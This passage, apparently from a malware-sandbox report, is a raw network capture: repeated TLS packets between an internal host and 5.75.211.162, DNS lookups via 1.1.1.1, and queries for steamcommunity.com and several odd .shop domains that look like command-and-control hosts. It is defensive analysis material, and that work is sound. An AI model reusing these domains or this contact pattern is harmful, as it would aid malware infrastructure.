                                                                                    Sep 27, 2024 00:15:51.365271091 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.365313053 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.366688013 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.366707087 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.366767883 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.366774082 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.366816044 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.367106915 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.367124081 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.367182970 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.367188931 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.367225885 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.418946981 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.418976068 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.419035912 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.419051886 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.419061899 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.419095993 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.436217070 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.436248064 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.436300993 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.436312914 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.436383009 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.436383009 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.451484919 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.451512098 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.451575041 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.451582909 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.451654911 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.452852011 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.452873945 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.452924013 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.452929020 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.452944994 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.453377962 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.453924894 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.453950882 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.454005003 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.454013109 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.454022884 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.454054117 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.455940962 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.455962896 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.456007957 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.456012964 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.456023932 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.456051111 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.457390070 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457422018 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457463026 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.457468033 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457480907 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.457511902 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.457863092 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457889080 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457932949 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.457937956 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.457983971 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.458013058 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.509785891 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.509815931 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.509874105 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.509893894 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.509902954 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.509939909 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.527003050 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.527029991 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.527086020 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.527093887 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.527120113 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.527129889 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.542455912 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.542490005 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.542536974 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.542543888 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.542562962 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.542573929 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.543452978 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.543479919 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.543529034 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.543534040 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.543565035 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.543584108 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.544608116 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.544629097 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.544688940 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.544693947 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.544713020 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.544732094 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.546724081 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.546746016 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.546809912 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.546816111 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.546849966 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.546869993 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.548515081 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.548541069 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.548599958 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.548605919 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.548641920 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.548666954 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.548962116 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.548981905 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.549026012 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.549030066 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.549078941 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.549093962 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.600733995 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.600766897 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.600910902 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.600924969 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.600970984 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.617769003 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.617800951 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.617852926 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.617858887 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.617897034 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.617913961 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.633289099 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.633315086 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.633452892 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.633460045 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.633513927 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.634241104 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.634265900 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.634330988 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.634336948 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.634378910 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.635298967 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.635317087 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.635369062 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.635374069 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.635421038 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.637597084 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.637619972 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.637677908 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.637684107 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.637725115 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.639534950 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.639554024 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.639601946 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.639606953 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.639636993 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.639655113 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.639911890 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.639928102 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.639970064 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.639975071 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.640002966 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.640017986 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.691659927 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.691687107 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.691759109 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.691766977 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.691824913 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.708569050 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.708592892 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.708674908 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.708681107 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.708724022 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.724323988 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.724347115 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.724386930 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.724392891 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.724431038 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.724931955 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.724951029 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.724993944 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.724999905 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.725025892 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.725065947 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.726339102 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.726360083 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.726461887 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.726468086 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.726509094 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.728908062 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.728933096 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.729011059 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.729017973 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.729059935 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.730905056 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.730927944 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.730989933 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.730995893 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.731023073 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.731041908 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.731298923 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.731314898 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.731394053 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.731394053 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.731401920 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.731487036 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.782407045 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.782433987 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.782541037 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.782553911 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.786843061 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.799443007 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.799468994 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.799545050 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.799551964 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.799583912 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.799601078 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.815371990 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.815402985 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.815488100 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.815514088 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.815526962 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.815989971 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.816010952 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.816065073 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.816071987 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.817409039 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.817430019 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.817487955 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.817496061 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.818339109 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.820636034 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.820652962 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.820710897 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.820715904 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.822329998 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.824570894 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.824585915 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.824649096 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.824655056 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.825539112 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.825557947 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.825628996 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.825634956 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.826277018 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.873152018 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.873172998 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.873320103 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.873332977 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.874639034 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.890471935 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.890500069 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.890631914 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.890641928 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.893393993 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906294107 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.906321049 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.906393051 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.906409979 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906419039 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.906443119 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906457901 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906482935 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.906688929 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906795979 CEST49793443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.906812906 CEST443497935.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.924812078 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.924846888 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:51.924933910 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.925179958 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:51.925194025 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:52.774321079 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:52.774427891 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:52.777542114 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:52.777570963 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:52.779347897 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:52.779366016 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:52.779400110 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:52.779407978 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.110232115 CEST49795443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.110272884 CEST443497955.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.110361099 CEST49795443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.110748053 CEST49795443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.110761881 CEST443497955.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.444502115 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.444580078 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.444653034 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.444693089 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.445724010 CEST49794443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:53.445745945 CEST443497945.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.759429932 CEST443497955.75.211.162192.168.2.4
                                                                                    Sep 27, 2024 00:15:53.759540081 CEST49795443192.168.2.45.75.211.162
                                                                                    Sep 27, 2024 00:15:54.750027895 CEST49795443192.168.2.45.75.211.162
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Sep 27, 2024 00:14:26.224596977 CEST5615153192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:14:26.439091921 CEST53561511.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:07.166815996 CEST5256853192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:07.184736967 CEST53525681.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:08.163095951 CEST5187753192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:08.177232981 CEST53518771.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:09.100766897 CEST6297753192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:09.114937067 CEST53629771.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:10.038405895 CEST5624053192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:10.052309036 CEST53562401.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:11.287487984 CEST4998153192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:11.300513983 CEST53499811.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:12.494857073 CEST6469853192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:12.510329008 CEST53646981.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:13.448158979 CEST6346053192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:13.461260080 CEST53634601.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.396934032 CEST5185953192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:14.413163900 CEST53518591.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:14.516217947 CEST5507353192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:14.526509047 CEST53550731.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:16.207473993 CEST6510853192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:16.222239017 CEST53651081.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:18.172069073 CEST5029253192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:18.178950071 CEST53502921.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:19.553369999 CEST5142753192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:19.574954033 CEST53514271.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:30.626862049 CEST4977453192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:30.635106087 CEST53497741.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:35.007052898 CEST5277353192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:35.025650978 CEST53527731.1.1.1192.168.2.4
                                                                                    Sep 27, 2024 00:15:39.390388966 CEST6447953192.168.2.41.1.1.1
                                                                                    Sep 27, 2024 00:15:39.399322033 CEST53644791.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Sep 27, 2024 00:14:26.224596977 CEST192.168.2.41.1.1.10xfedeStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:07.166815996 CEST192.168.2.41.1.1.10xa62eStandard query (0)wallkedsleeoi.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:08.163095951 CEST192.168.2.41.1.1.10x5b13Standard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:09.100766897 CEST192.168.2.41.1.1.10x9409Standard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:10.038405895 CEST192.168.2.41.1.1.10x1e8cStandard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:11.287487984 CEST192.168.2.41.1.1.10xb0eeStandard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                                    Sep 27, 2024 00:15:12.494857073 CEST192.168.2.41.1.1.10x731cStandard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
